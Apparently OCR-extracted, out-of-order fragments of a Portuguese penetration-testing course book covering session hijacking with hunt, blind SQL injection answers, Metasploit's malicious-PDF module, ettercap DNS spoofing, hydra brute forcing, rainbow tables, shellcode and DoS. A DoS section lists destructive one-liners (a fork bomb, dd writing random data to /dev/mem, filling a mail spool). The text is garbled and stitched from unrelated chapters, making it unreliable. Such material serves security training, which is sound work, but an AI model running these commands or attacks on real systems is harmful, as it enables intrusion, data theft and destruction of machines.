quatro horas afiando o machado Abraham Lincoln 5 3 P
187. pouco porque pode demorar at que todas as conex es sejam exibidas Podemos ainda usar a op o W para sniffar as conex es Escolhendo a op o L na shell vemos que algumas m quinas est o trocando dados com o IP de destino configurado Ent o usamos a op o S do menu principal que o simple hijacking O hunt pedir qual conex o deseja sequestrar e elas vir o numeradas Basta escolher pela ordem num rica a conex o Voc pode perceber ent o que at agora n o aconteceu nada estamos apenas sniffando a conex o mas quando pressionamos CTRL C aparecer a mensagem 3 IRS press any key gt Quando pressionarmos qualquer tecla o sequestro est realizado e estaremos em modo interativo na conex o como se tom ssemos a identidade do CLIENTE e o SERVIDOR continuar recebendo dados agora vindos de nossa m quina O CLIENTE de repente percebe que os comandos simplesmente n o est o funcionando mas n o aparece nenhuma mensagem de erro simplesmente o que o CLIENTE digitar como um ls n o far nenhum efeito Sequestrada a conex o poderemos fazer o que quisermos com o SERVIDOR Quando tudo estiver terminado basta dar um CTRL C para sair Mas a vem a pergunta e se minha rede possuir SWITCH bem simples vamos seguir os passos Fa a a mesma coisa que fizemos acima configurando o que o hunt monitorar liste as conex es no menu principal use a op o d
188. r explorado basta contar quantas horas isso vai demorar Al m da explora o para conseguir acesso ao servidor e seus arquivos temos os ataques do tipo DoS e DDos que causam a indisponibilidade do servi o sendo executado n o permitindo acesso aos site hospedados no servidor WEB comprometido Imagine as implica es e preju zos de um ataque desse tipo num servidor que hospeda um site ou servi o importante como uma loja online por exemplo 16 3 Fingerprint em Web Server Antes de testar qualquer tipo de ataque contra um servidor WEB que tenha sido descoberto ao longo do processo de teste de invas o precisamos ter acesso algumas informa es b sicas sobre nosso alvo Um dos meios de se conseguir isso atrav s do fingerprint realizado sobre o servidor WEB ou simplesmente usando o dom nio hospedado no mesmo como par metro A seguir vamos ver uma ferramenta que realiza esse procedimento automaticamente bastando que informemos o nome do dom nio hospedado Cap tulo 16 Ataques a Servidores WEB 192 16 3 1 Httprint Ferramenta para pegar o banner de identifica o do servidor web httprint version 0 301 Input File E pentesttenumerationynanahttprintuvin32A input xml S Load i ae map ver File B pentestenumeration www httprint win32 siqnatures txt www procardiaco com br 80 Microsof t II576 0 FACD41D36ED3C295811C9DC5811C9DC581 L1CIDCS 0D7645B5811C9DCS5 2A200B
189. r o final da string e parar n o executando o restante do nosso payload Mais detalhes veremos logo abaixo Shellcode Injet vel x31 xdb xb0 x01 xcd x80 No exemplo de explora o de um Stack Overflow utilizaremos um outro shellcode que se encarregara de executar o bin sh ao inv s de executar a funcao exit como o shellcode acima faz 18 5 Buffer Overflow Um buffer overflow acontece quando um programa vulneravel a esse tipo de falha tenta copiar mais informacoes para dentro de um buffer do que esse buffer consegue suportar Para visualizar isso a mesma coisa que pegar uma garrafa de refrigerante de 2 litros e virar ela toda num copo de 500ml Com certeza ocorrer uma sujeira na mesa em que isso foi feito e a mesma coisa que ocorre na mem ria um esparramado de caracteres sobre a mem ria que ir sobrescrever informa es importantes assim como o refrigerante sujou toda a toalha da mesa As vulnerabilidades de buffer overflow s o consideradas amea as cr ticas de seguran a apesar de ser uma falha bem conhecida e bastante s ria que se origina exclusivamente na ignor ncia do programador referente a aspectos de seguran a durante a implementa o do programa o erro se repete sistematicamente a cada nova vers o ou produto liberado Este tipo de vulnerabilidade tem sido largamente utilizado para a penetra o remota de computadores ligados a uma rede onde um atacante an nimo tem como objetivo obter
190. r prio WebGoat da a dica o range vai de 65 a 122 que deve ser substitu do no valor encontrado por na string abaixo 101 AND SELECT ASCII SUBSTR first name 1 1 FROM user data WHERE userid 15613 Cap tulo 13 Vulnerabilidades em aplica es web 172 Para resolver o problema devemos testar em todas as posi es todos os caracteres Existem ferramentas prontas que fazem essa verifica o de forma autom tica Segue a resposta para esse desafio 101 AND SELECT ASCII SUBSTR first name 1 1 FROM user data WHERE userid 15613 74 101 AND SELECT ASCII SUBSTR first name 2 1 FROM user data WHERE userid 15613 111 101 AND SELECT ASCII SUBSTR first name 3 1 FROM user data WHERE userid 15613 101 101 AND SELECT ASCII SUBSTR first name 4 1 FROM user data WHERE userid 15613 115 101 AND SELECT ASCII SUBSTR first name 5 1 FROM user data WHERE userid 15613 112 101 AND SELECT ASCII SUBSTR first name 6 1 FROM user data WHERE userid 15613 104 A s tima letra nao existe Isso significa que a resposta possui apenas 6 caracteres Agora basta substituir os valores encontrados por seu respectivo caractere na tabela ASCII Resultado Joseph gt Injection Flaws gt String SQL Injection Se inserirmos apenas o Smith ele nos mostra a chamada e o resultado Ent o percebemos que podemos passar um valor VERDADEIRO para o LAST NAME e ent o pegar todos os outros usu
191. ra sites de update v update microsoft com Cap tulo 9 Testando o sistema 103 e Contra sites grandes vy CNN v Yahoo 9 3 DoS De acordo com a defini o do CERT Computer Emergency Response Team os ataques DoS Denial of Service tamb m denominados Ataques de Nega o de Servicos consistem em tentativas de impedir usuarios legitimos de utilizarem um determinado servi o de um computador Para isso s o usadas t cnicas que podem sobrecarregar uma rede a tal ponto em que os verdadeiros usu rios dela n o consigam us la derrubar uma conex o entre dois ou mais computadores fazer tantas requisi es a um site at que este n o consiga mais ser acessado negar acesso a um sistema ou a determinados usu rios Explicando de maneira ilustrativa imagine que voc usa um nibus regularmente para ir ao trabalho No entanto em um determinado dia uma quantidade enorme de pessoas furaram a fila e entraram no ve culo deixando o t o lotado que voc e os outros passageiros regulares n o conseguiram entrar Ou ent o imagine que voc tenha conseguido entrar no nibus mas este ficou t o cheio que n o conseguiu sair do lugar por excesso de peso Este nibus acabou negando o seu servi o o de transport lo at um local pois recebeu mais solicita es neste caso passageiros do que suporta importante frisar que quando um computador site sofre ataque Dos ele n o invadido mas sim tem apenas o
192. rabilidade Executando o comando db vulns listaremos os detalhes da mesma msf gt db vulns Time Thu Nov 25 00 50 27 UTC 2010 Vuln host 192 168 1 204 port 80 proto tcp name HTTP TRACE ENABLED refs BAhbBylIQ1ZFIg4yMDA1LTMzOTg BAhbBylIQ1ZFIg4yMDA1LTMOOTg BAhbByIKTINWREIiICDgSNw BAhbBylIQkIEIgoxMTYwNA BAhbByIIQkIEIGk5NTA2 BAhbBylIIQkIEIgk5SNTYx msf gt A informa o sobre a vulnerabilidade est codificada no formato base64 e por isso precisamos decodific la Podemos usar o openssl para isso Cap tulo 19 Metasploit Framework 257 msf gt echo BAhbBylIQ1ZFIg4yMDA1LTMzOTg openssl base64 d exec echo BAhbBylIQ1ZFIg4yMDA1LTMzOTg openssl base64 d CVE 2005 3398 msf gt Podemos agora usar essa informa o para conseguir mais detalhes obre a vulnerabilidades reportada Como pentesters devemos investigar cada informa o encontrada e identificar se h potenciais m todos de ataque 19 15 Laboratorio Metasploit Objetivos 1 gt Obter acesso remoto na m quina Linux explorando uma falha que possibilite a execu o de uma backdoor 2 gt Obter acesso nas m quinas Windows atrav s do Metasploit 19 16 Contramedidas e Manter todos os aplicativos atualizados e Aplicar patches de corre o e seguran a e Manter regras de firewall bem configuradas
193. ran a da Informa o 16 1 4 5 ITIL um conjunto de boas pr ticas para gest o opera o e manuten o de servi os de TI aplicados na infraestrutura A ITIL busca promover a gest o de TI com foco no cliente no servi o apresentando um conjunto abrangente de processos e procedimentos gerenciais organizados em disciplinas com os quais uma organiza o pode fazer sua gest o t tica e operacional em vista de alcan ar o alinhamento estrat gico com os neg cios 1 4 6 COBIT Do ingl s Control Objectives for Information and related Technology um guia de boas pr ticas como um framework voltadas para a gest o de TI Inclui em sua estrutura de pr ticas um framework controle de objetivos mapas de auditoria ferramentas para a sua implementa o e um guia com t cnicas de gerenciamento 1 4 7 NIST 800 Series S rie de documentos guias e pesquisas desenvolvidos pelo National Institute of Standards and Technology voltadas para a rea de seguran a da informa o Essa s rie composta de documentos considerados Special Publications os quais abordam desde seguran a na tecnologia Bluetooth at seguran a em servidores Yy Dica o documento desta s rie que equivalente ao que estamos estudando ao longo desse curso que pode inclusive representar uma metodologia espec fica o NIST 800 115 1 5 Por que precisamos de seguran a e Evolu o da tecnologia focando a facilidade de us
194. re eles e Normal T3 o comportamento default do Nmap o qual tenta executar t o r pido quanto poss vel sem sobrecarregar a rede ou perder hosts portas e Aggressive I 4 esse modo adiciona um timeout de 5 minutos por host e nunca espera mais que 1 25 segundos para testar as respostas e Insane T5 somente adequando para redes muito r pidas ou onde voc n o se importa em perder algumas informa es Nesta op o o timeout dos hosts acontece em 75 segundos e espera somente 0 3 segundos por teste individual Y Op es Interessantes p gt Utilizado para especificar portas O gt Mostra a vers o do S O P0 gt Desativa ICMP tipo 8 e o TCP ACK na porta 80 7 6 Pr tica dirigida 7 6 1 Mapeando portas abertas em um servidor E nmap sT 192 168 0 173 Esta varredura o comportamento padr o do Nmap que utilizado quando n o temos privil gios de root ou em redes Ipv6 Nesta varredura o Nmap utiliza uma chamada de sistema do tipo connect e seu desempenho depende fortemente da implementa o da pilha TCP IP feita no sistema operacional Os resultados poss veis para esta varredura s o e Open Filtered Aberta e aceitando conex es e ou filtrada por firewall e Closed Filtered Porta fechada e ou filtrada por firewall Cap tulo 7 Varreduras ativas passivas e furtivas de rede 86 Varreduras baseadas em fim de conex o E nmap sF 192 168 0 173
195. realizadas dentro do sistema comprometido Como o pen tester tem autoriza o para realizar os testes n o necess rio apagar rastros Isso se torna importante para um pen tester apenas se quiser testar tamb m a capacidade da equipe de per cia forense e respostas a incidentes de descobrir o que foi feito e recuperar informa es alteradas 2 5 Categorias de ataques H v rios tipos de ataque poss veis de serem realizados Podemos dividir tais ataques em dois grandes grupos 2 5 1 Server Side Attacks Server Side Attack ou ataque ao servidor foca na tentativa de explorar servi os que est o em execu o em um determinado dispositivo Normalmente n o precisam de intera o do usu rio e prov uma Shell remota para o atacante e S o exemplos de ataques a servidores e Ataques a servidores WEB e Ataques a servidores de e mail e Ataques a servidores DNS e Ataques a servi os RPC Cap tulo 2 Introdu o ao Teste de Invas o e tica Hacker 35 2 5 2 Client Side Attacks Client Side Attacks ou ataques ao cliente foca na tentativa de explorar aplica es que s o executadas no computador e que normalmente precisam de uma intera o da pessoa para que o ataque seja executado S o exemplos de ataques ao cliente e Explora o de falhas no Internet Explorer e Explora o de falhas em editores de texto e Explora o de falhas em Clientes de E mail e Explora o de falhas em programas reprodutores de v de
196. respostas sao SA que representa um SYN ACK e um RA que representa um Reset ACK a resposta padr o para portas fechadas 7 4 Nmap Nmap pode ser considerada uma das ferramentas mais completas para realizar varreduras em redes pois possui um n mero imenso de op es permitindo explorarmos quase todas as possibilidades de varreduras poss veis Essa ferramenta possui inclusive op es que permitem burlar sistemas de prote o como IDS IPS e Firewall cujas regras poderiam bloquear ou detectar varreduras n o permitidas Sintaxe nmap Scan Type s Options target specification 7 5 M todos de Varredura 7 5 1 sP Ping scan Algumas vezes necess rio saber se um determinado host ou rede est no ar Nmap pode enviar pacotes ICMP echo request para verificar se determinado host ou rede est ativa Hoje em dia existem muitos filtros que rejeitam os pacotes ICMP echo request ent o envia um pacote TCP ACK para a porta 80 Cap tulo 7 Varreduras ativas passivas e furtivas de rede 83 default e caso receba RST o alvo est ativo A terceira t cnica envia um pacote SYN e espera um RST ou SYN ACK 7 5 2 SV Version detection Ap s as portas TCP e ou UDP serem descobertas por algum dos m todos o nmap ir determinar qual o servi o est rodando atualmente O arquivo nmap service probes utilizado para determinar tipos de protocolos nome da aplica o n mero da vers
197. rios s culos desse acontecimento acabamos descobrindo que esse truque foi ressuscitado Cap tulo 10 Trojans Backdoors V rus Rootkits e Worms 120 Os cavalos de tr ia dos computadores s o programas que aparentemente funcionam normais mas na verdade eles acabam realizando outra tarefa sem que o usu rio tome conhecimento Um exemplo disso quando recebemos um email contendo um jogo anexado Quando rodamos o jogo conseguimos jogar normalmente mas na verdade alem do jogo pode estar sendo executados outros programas em conjuntos para dar acesso ao seu computador a um poss vel atacante quando voc se conectar internet ou ent o voc pode ter informa es roubadas e enviadas por email para o atacante ou onde for a imagina o do hacker Um exemplo de um cavalo de tr ia quando um hacker altera um arquivo do computador para se esconder ou esconder os seus arquivos dentro da maquina invadida Isso pode ser feito alterando o programa respons vel por listar os arquivos dentro de um diret rio ou ent o alterando o programa respons vel por mostrar todas as conex es ativas ao computador para o administrador Um hacker quando ataca uma m quina provavelmente ele ir instalar um conjunto de ferramentas formadas por trojans e backdoor para se esconder e garantir o acesso futuro a maquina que foi invadida Esse conjunto de ferramenta conhecido por Rootkit 10 4 Rootkits Rootkit um conjunto de ferramentas qu
198. rminados tipos de varredura possam ser realizadas N o permitir que usu rios na rede tenham acesso as configura es do navegador para configurar proxys Manter IDS s instalados e bem configurados observando sempre seus logs e relat rios Cap tulo 7 Varreduras ativas passivas e furtivas de rede 91 Cap tulo 8 Enumera o de informa es e servi os 8 1 Objetivos e Mapear a rede e Descobrir servi os e vers es sendo executadas na rede Cap tulo 8 Enumera o de informa es e servi os 92 8 2 Enumera o As t cnicas de enumera o s o utilizadas como um complemento s fases de fingerprint e varredura O objetivo descobrir servi os e vers es que est o sendo executados no sistema alvo facilitando a posterior pesquisa de vulnerabilidades e exploits espec ficos Quanto mais informa es tivermos sobre nosso alvo mais f cil ser para encontrarmos vulnerabilidades e melhorarmos nossos vetores de ataque Sabendo os servi os rodando e as vers es dos mesmos torna se poss vel encontrarmos os exploits corretos e as vulnerabilidades que poder o ser exploradas Al m disso na fase de enumera o mapeameos toda a rede do alvo descobrindo os pontos falhos e onde podemos explorar para conseguir acesso a informa es estrat gicas 8 3 Aquisi o de banners Falaremos agora a respeito da captura de informa es sobre os servi os que est o rodando em uma m quina
199. ropaganda e ajuda Na sabotagem o hacker causa problemas na rede ent o divulga que possui a solu o para este e se prop e a solucion lo Na expectativa de ver a falha corrigida os funcion rios passam para o hacker todas as informa es por ele solicitadas Ap s atingir o seu objetivo o hacker elimina a falha e a rede volta funcionar normalmente Resolvido o problema os funcion rios sentem se satisfeitos e jamais desconfiar o que foram alvos de um hacker A melhor refer ncia que atualmente temos sobre engenharia social o site do projeto Social Engineering Framework Para maiores informa es acessem w http www social engineer org framework Social Engineering Framework 6 6 No Tech Hacking Todo e qualquer tipo de ataque que n o tenha necessidade de aparatos tecnol gicos nem computadores s o considerados no tech hackings Esse m todo normalmente utilizado para testar a seguran a f sica de uma empresa ou organiza o englobando inclusive a engenharia social Podemos citar como tipos de ataques no tech e dumpster diving Cap tulo 6 Entendendo a Engenharia Social e o No Tech Hacking 77 e shoulder surfing e lock picking tailgating 6 7 Contramedidas e Mantenha protegido n o trabalhe em assuntos privados em locais p blicos e Fa a o descarte seguro de documentos e Utilize fechaduras e trancas de boa qualidade e comprovado n vel de seguran a e Man
200. rs Pharming2 html o Atacante Site falso vrvrwebancoxyz com br Servidor ONS Local ou ISP Usu rio Cap tulo 15 T cnicas de Sniffing 187 15 7 1 Ataque DNS Para redirecionar para um site web espec fico R cd usr share ettercap mv f etter dns etter dns old vim etter dns A xx xx xx xx www dot test dot com Explicando o conte do do arquivo e dominio ou ip que ser redirecionado xxx xxx xxx xxx IP do site falso e www sitefalso com br URL do site falso Comando z amp ettercap i eth0 T q P dns spoof M arp 15 8 Pr tica dirigida 1 Definir duplas para a pr tica 2 Especificar o site que ser redirecionado e para onde ser feito o redirecionamento 3 Lan ar o ataque no companheiro de pr tica e depois inverter os pap is onde ser o atacante e o outro o alvo Cap tulo 15 T cnicas de Sniffing 188 15 9 Contramedidas A melhor defesa contra um sniffer de rede a criptografia A criptografia n o previne o ataque de sniffer por m um atacante n o conseguir identificar os dados que ele capturou Tamb m existem ferramentas capazes de analisar e detectar ataques ARP O link a seguir um v deo do funcionamento de uma ferramenta que detecta esse ataque tw http www colasoft com download arp flood arp spoofing arp poisoning at tack solution with capsa php Cap tulo 15 T cnicas de Sni
201. s Agora hora de criar uma rainbow table Altere o diret rio corrente em seu terminal de comando para o diret rio do RainbowCrack e execute o comando seguinte E cd pentest passwords rcrack rtgen md5 loweralpha numeric 1 7 0 3800 33554432 0 Esse comando leva 4 horas para ser completado em um computador com um processador Core2 Duo E7300 poss vel parar a execu o do mesmo a qualquer momento pressionando Ctrl C Da pr xima vez que o comando for executado com a mesma linha de comando ele continuar a partir do ponto em que foi interrompido para continuar com a gera o da tabela Quando o comando tiver terminado um arquivo com o nome de md5 loweralpha numeric 1 7 0 3800x33554432 O rt e tamanho de 512 MB ser criado O nome do mesmo simplesmente a linha de comando utilizada com os par metros interligados com a extens o rt O programa rcrack que ser explicado mais a frente precisa dessas informa es para saber quais os par metros existentes na rainbow table Portanto n o renomeie o arquivo As demais tabelas podem ser geradas da mesma forma com os comandos rtgen md5 loweralpha numeric 1 7 1 3800 33554432 0 rtgen md5 loweralpha numeric 1 7 2 3800 33554432 0 rtgen md5 loweralpha numeric 1 7 3 3800 33554432 0 rtgen md5 loweralpha numeric 1 7 4 3800 33554432 0 rtgen md5 loweralpha numeric 1 7 5 3800 33554432 0 Finalmente esses arquivos s o gerados
202. s Cap tulo 14 Eleva o de Privil gios Locais 177 4 Acessar as informa es j com privil gio maior do que o privil gio anterior 14 5 Laborat rio 14 5 1 Desafio 1 1 Atrav s do PHP Shell existente em uma das m quinas da rede de teste descobrir qual a vers o do kernel da m quina alvo 2 Buscar um exploit que possa conseguir o shell a partir de alguma vulnerabilidade da vers o atual do kernel que est sendo executado 14 5 2 Desafio 2 1 A outra tarefa explorar o arquivo com SUID root que se encontra em uma das m quinas da rede de teste 2 Crie um trojan local no sistema que permitir com que o atacante obtenha privil gios de root ap s executar um interpretador de comando 14 6 Contramedidas e Manter o sistema atualizado e Deixar com suidroot apenas os arquivos necess rios para o funcionamento do sistema Cap tulo 19 Metasploit Framework 262 Cap tulo 20 Apagando Rastros 20 1 Objetivos e Entender a import ncia de cobrir rastros e Conhecer as t cnicas para encobrir suas a es e Conhecer as ferramentas empregadas Cap tulo 20 Apagando Rastros 263 20 2 Por que encobrir rastros Um dos objetivos em um teste de invas o de utilizar t cnicas para encobrir seus rastros e a es para testar a efic cia e compet ncia do time de resposta a incidentes e per cia forense caso os mesmos existam As t cnicas para apagar rastros tamb m s
203. s ES msf gt use exploit windows fileformat adobe pdf embedded exe msf gt show options 524 exploits 246 auxiliary 193 payloads 23 encoders 8 nops svn r8580 updated today 2010 02 22 msf gt exploit windows fileformat adobe pdf embedded exe sf exploit gt show options Module options Name Current Setting Required Description EXENAME Name of payload exe FILENAME evil pdf output filename INFILENAME y The Input PDF filename OUTPUTPATH data exploits The location to output the file Exploit target Id Name 3 Adobe Reader v8 x v9 x Windows XP SP3 English msf exploit a Vamos alterar as seguintes opcoes e FILENAME Ser gerado o arquivo pdf com o nome aqui especificado por n s e INFILENAME payload e OUTPUTPATH o diret rio onde ser criado e armazenado o pdf Aqui especificaremos um pdf como modelo para anexar nosso El gt set FILENAME planilha2 pdf gt set INFILENAME root planilha pdf gt set OUTPUTPATH root gt show options Cap tulo 19 Metasploit Framework 239 msf exploit adobe pdf embedded exe set FILENAME planilha2 pdf FILENAME gt pLanilha2 pdf msf exploit adobe pdf embedded exe set INFILENAME root PLANILHA pdf INFILENAME gt root PLANILHA pdf msf exploit adobe pdf embedded exe set OUTPUTPATH root OUTPUTPATH gt root msf exploit adobe pdf embedded exe show options Module options Name Curr
204. s Web Application Firewall 13 4 8 Insecure Cryptographic Storage Todas as informa es recebidas ou manipuladas por uma aplica o WEB ficam armazenadas em algum local seja ele um banco de dados no mesmo servidor ou remoto A forma como essas informa es est o sendo armazenadas em uma base de Cap tulo 13 Vulnerabilidades em aplica es web 167 dados por exemplo ou que trafegam ao longo dos canais de transmiss o definir qu o facilmente um atacante poder ter acesso a tais informa es ao lan ar um ataque de comprometimento da aplica o Por isso vamos ver abaixo os tipos de ataques mais utilizados para ter acesso as informa es armazenadas Tipos de Ataques e Senhas fracas Brute force e Senhas fortes Wordlist e Rainbowcrack hash sites e Md5 Web Crackers w Did era clcom mdScrack Using Google to crack passwords Crack that hash baby Generate MD5 Hash Diferen as e Brute force Normal 350 milh es de senhas texto puro por segundo e Rainbow 62 223 milh es de senhas em texto puro por segundo Cap tulo 13 Vulnerabilidades em aplica es web 168 13 4 9 Failure to Restrict URL Access e Controle de sess o para acessar as p ginas Nem sempre todas as p ginas de uma aplica o podem estar acess veis aos clientes que navegam por ela Na maioria das vezes h alguma parte da aplica o ou sess o espec fica de um site que n o pod
205. s analisar o comando seguinte hydra l hydra P password lst s 80 lt IP gt http post form administrador index php usuario USER amp senha PASS amp submit Lo gin Incorrect Username O par metro USER ser substitu do pelos usu rios no nosso caso o valor passado para a op o l no nosso caso o valor hydra e o par metro PASS sera substitu do pelos valores passados na op o P no nosso caso uma wordlist chamada password Ist Cap tulo 12 T cnicas de For a Bruta 146 No exemplo do nosso arquivo que se encontra na vmware de testes acess vel atrav s do endere o http lt ip vm gt bf podemos usar o seguinte comando para realizarmos o ataque de bruteforce E root bt tmp hydra l admin P wl txt o resultado txt 192 168 3 106 http get form bf bf php usuario USER amp senha PASS amp submit Enviar incorreta 12 7 BruteSSH2 O BruteSSH2 um script que pode ser encontrado em C Perl ou Python que realiza ataques de for a bruta na porta 22 e utiliza wordlists para descobrir senhas Para executar s entrar como root e digitar E l chmod 777 brutessh2 py brutessh2 py 12 8 Rainbow Crack RainbowCrack um programa que gera rainbow tables para serem usadas na quebra de senhas O RainbowCrack difere dos programas de for a bruta convencionais pois utiliza tabelas previamente criadas chamadas rainbow tables
206. s de dentro da pr pria organiza o O objetivos por detr s dos ataques de insiders podem ser v rios desde descobrir quanto o colega do lado ganha at conseguir acesso a informa es confidenciais de um projeto novo para vender ao concorrente de seu empregador 6 4 2 Roubo de identidade Atualmente quando algu m cria uma nova identidade baseando se em informa es de outra pessoa essa identidade chamada de laranja Dentro de empresas o roubo de credenciais para acessar informa es que n o est o acess veis a todos um fato corriqueiro que pode passar pelo simples shoulder surfing clonagem de ID Card 6 4 3 Phishing Scam uma forma de fraude eletr nica caracterizada por tentativas de adquirir informa es sigilosas ou instalar programas maliciosos na m quina alvo Na pr tica do Phishing surgem artimanhas cada vez mais sofisticadas para pescar do ingl s fish as informa es sigilosas dos usu rios Cap tulo 6 Entendendo a Engenharia Social e o No Tech Hacking 75 6 4 4 URL Obfuscation T cnica utilizada para diminuir o tamanho de URL s muito grandes Exemplos de servi os e migre me e okm me e digito Isso pode ser utilizado para ocultar URL com par metros ou tags maliciosos como tags de javascript para ataques de XSS por exemplo 6 4 5 Dumpster Diving o ato de vasculhar lixeiras em busca de informa es Todos os dias s o jogados no lixo de empresas
207. s para se ter tantas m quinas foi inserir programas de ataque DDoS em v rus ou em softwares maliciosos Em um primeiro momento os hackers que criavam ataques DDoS tentavam escravizar computadores que agiam como servidores na internet Com o aumento na velocidade de acesso internet passou se a existir interesse nos computadores dos usu rios comuns com acesso banda larga j que estes representam um n mero muito grande de m quinas na internet Para atingir a massa isto a enorme quantidade de computadores conectados internet v rus foram e s o criados com a inten o de disseminar pequenos programas para ataques DoS Assim quando um v rus com tal poder contamina um computador este fica dispon vel para fazer parte de um ataque DoS e o usu rio dificilmente fica sabendo que sua m quina est sendo utilizado para tais fins Como a quantidade de computadores que participam do ataque grande praticamente imposs vel saber exatamente qual a m quina principal do ataque Quando o computador de um internauta comum infectado com um v rus com fun es para ataques DoS este computador passa a ser chamado de zumbi Ap s a contamina o os zumbis entram em contato com m quinas chamadas de mestres que por sua vez recebem orienta es quando em qual site computador tipo de ataque entre outros de um computador chamado atacante Ap s receberem as ordens os computadores mestres as repassam aos computadores zu
208. ser restaurada e a execu o deve retomar na instru o seguinte de chamada da fun o o que chamamos de ep logo As instru es CALL LEAVE e RET nas m quinas Intel s o fornecidas para parte do pr logo e ep logo em chamadas de fun o A instru o CALL salva na pilha o endere o da instru o seguinte como endere o de retorno da fun o chamada A instru o RET deve ser chamada dentro do procedimento e restaura a execu o no endere o que est no topo da pilha Texto mstru es do programa Par metros da fun o Endere o de ret vari veis globais e est ticas Frame de chamada de procedimento t Endere os altos q Base da pilha FP salvo da fun o anterior FP p Vari veis locais 4 5P 4 Endere os baixos 18 4 Shelicode Shellcode um grupo de instru es assembly em formato de opcode para realizar diversas fun es como chamar uma shell ou escutar em uma porta Geralmente um shellcode utilizado para explorar determinada vulnerabilidade ganhando se controle sobre a aplica o vulner vel e podendo se executar qualquer instru o desejada Exemplo de shellcode mais simples poss vel Cap tulo 18 Exploits 210 Shellcode xbb x00 x00 x00 x00 xb8 x01 x00 x00 x00 xcd x80 O shellcode acima n o injet vel pois possui Null Bytes x00 o que caracteriza um final de string Portanto ao usarmos o shellcode acima o programa encontra
209. servi o parado Os ataques do tipo DoS mais comuns podem ser feitos devido a algumas caracter sticas do protocolo TCP IP Transmission Control Protocol Internet Protocol sendo poss vel ocorrer em qualquer computador que o utilize Uma das formas de ataque mais conhecidas a SYN Flooding onde um computador tenta estabelecer uma conex o com um servidor atrav s de um sinal do TCP conhecido por SYN Synchronize Se o servidor atender ao pedido de conex o enviar ao computador solicitante um sinal chamado ACK Acknowledgement O problema que em ataques desse tipo o servidor n o consegue responder a todas as solicita es Cap tulo 9 Testando o sistema 104 e ent o passa a recusar novos pedidos Outra forma de ataque comum o UPD Packet Storm onde um computador faz solicita es constantes para que uma m quina remota envie pacotes de respostas ao solicitante A m quina fica t o sobrecarregada que n o consegue executar suas fun es N o s o apenas grande quantidades de pacotes geradas que podem causar um ataque de nega o de servi o Problemas em aplicativos tamb m podem gerar e Ping da Morte 9 3 1 Exemplo de ataques DoS Em Linux soris dd if dev zero of var spool mail meu usuario perl e while 1 forkQ open fh lt proc meminfo open hf gt tmp bla dd if dev urandom of dev mem perl e fork while fork Em Windows e Em um bat
210. smo Nega o de servi o DoS Comprometimento de servi os de Disponibilidade import ncia fundamental para processos Comprometimento de informa es Modificar dados de forma a ficarem in teis para outras pessoas O n vel de seguran a desejado pode se consubstanciar em uma pol tica de seguran a que seguida pela organiza o ou pessoa para garantir que uma vez estabelecidos os princ pios aquele n vel desejado seja perseguido e mantido de extrema import ncia saber equilibrar o n vel de seguran a com a funcionalidade e facilidade de uso do sistema pois o mais importante para a empresa o neg cio e a seguran a existe para proteger o neg cio da empresa e n o atrapalh lo 1 6 6 Terminologias de seguran a e Vulnerabilidade fragilidade que pode fornecer uma porta de entrada a um atacante e Amea a agente ou a o que se aproveita de uma vulnerabilidade e Risco Impacto X Probabilidade da amea a ocorrer e Ataque Incid ncia da amea a sobre a vulnerabilidade e Exploit Programa capaz de explorar uma vulnerabilidade Cap tulo 1 Introdu o Seguran a da Informa o 20 1 7 Amea as e ataques Em seguran a da informa o precisamos estar atentos s poss veis amea as que podem de alguma maneira comprometer os pilares de SI A partir das amea as podemos ter no o dos riscos que envolvem a atividade organizacional Para cada tipo de atividade ou contexto o conju
211. ssante ferramenta vamos instal la para testar suas funcionalidades R aptitude install hunt Atrav s das op es existentes no menu da ferramenta vamos navegar entre eles para conhecer as op es existentes e testar algumas funcionalidades Vamos testar algumas dessas ferramentas na rede alvo para ver o que conseguimos Para iniciar o hunt para executarmos o comando hunt E sera exibida a seguinte tela para nos l w r list watch reset connections host up tests arp simple hijack avoids ack storm if arp used simple hijack daemons rst arp sniff mac options exit Onde e O gt o prompt do shell do hunt e 1 w r list watch reset connections Lista as conex es ativas L assiste a uma conex o W e encerra uma conex o R e a arp simple hijack avoids ack storm if arp used essa ser a ltima op o que usaremos Essa op o para ser usada caso sua rede for segmentada por switch pois ela permite Arp Poisoning Cap tulo 9 Testando o sistema 114 e s simple hijack para realizar o sequestro de sess o no caso de sua rede n o ser segmentada e 0 options onde iremos configurar tudo para iniciar o hijacking e x exit essa op o usaremos para sair da configura o do hunt Para iniciarmos a configura o dos par metros necess rios para nosso ataque escolhemos a op o o e a seguinte tela ser exibida l list
212. ssas de um teste de intrus o Ainda em acordo com a OSSTMM o resultado final deve conter os seguintes t picos Data e hora dos testes Tempo de dura o dos testes Analistas e pessoas envolvidas Tipo do teste Escopo do teste O resultado da enumera o Margens de erro Qualifica o do risco Qualquer tipo de erro ou anomalia desconhecida Cap tulo 2 Introdu o ao Teste de Invas o e tica Hacker 37 Yy Dica a metodologia OSSTMM voltada mais para testes em sistemas e infraestrutura apesar de tamb m contemplar testes em aplica es WEB A metodologia desenvolvida pelo OWASP j espec fica para testes de invas o em aplica es WEB 2 7 Como conduzir um teste de invas o Alguns passos b sicos s o necess rios para a prepara o e realiza o de um teste de invas o para que o mesmo seja bem sucedido Dentre esses passos ou fases podemos destacar os seguintes Passo 1 Converse com seu cliente sobre as necessidades do teste Esse um dos passos mais importantes pois n o podemos deixar que existam zonas cinza no que foi contratado e acertado entre o cliente e o pen tester Aqui definimos tudo desde o escopo ao tipo de teste que ser realizado Aqui tamb m definido o que permitido e o que n o permitido realizar durante o teste Passo 2 Prepare o contrato de servi o e pe a ao cliente para assin los Depois de tudo definido no primeiro passo feito u
213. st endere ado com posterior assinatura do representando do contratante e do contratado Sum rio executivo No sum rio executivo contextualizamos todo o teste de invas o definindo os hor rios de realiza o dos testes as necessidades do teste de invas o apresentadas pelo contratante o retorno de investimento que um pen test pode trazer para a empresa e etc Defini o do escopo Na defini o de escopo onde descrevemos o tipo e o n vel do teste realizado descrevendo o que foi e at onde foi testado Aqui nos baseamos nas permiss es que recebemos do contratante de at onde podemos ir e o que podemos fazer Defini o dos vetores de ataque Aqui entra o mapa mental que criamos com os poss veis vetores de ataque e o planejamento para cada possibilidade Definimos tamb m as varias possibilidades de ataque classificando as de acordo com o n vel de facilidade para alcan ar o objetivo definido no escopo do teste Outro aspecto que entra nessa se o s o os resultados obtidos com o mapeamento da rede e a defini o dos alvos Ataques realizados Na defini o dos ataques realizados v rias informa es devem estar contidas nessas defini es S o elas v Ferramentas utilizadas Cap tulo 3 Escrita de Relat rio 44 v Exploits executados vy Comandos utilizados v Resultados recebidos v Classifica o das vulnerabilidades por n vel de facilidade de 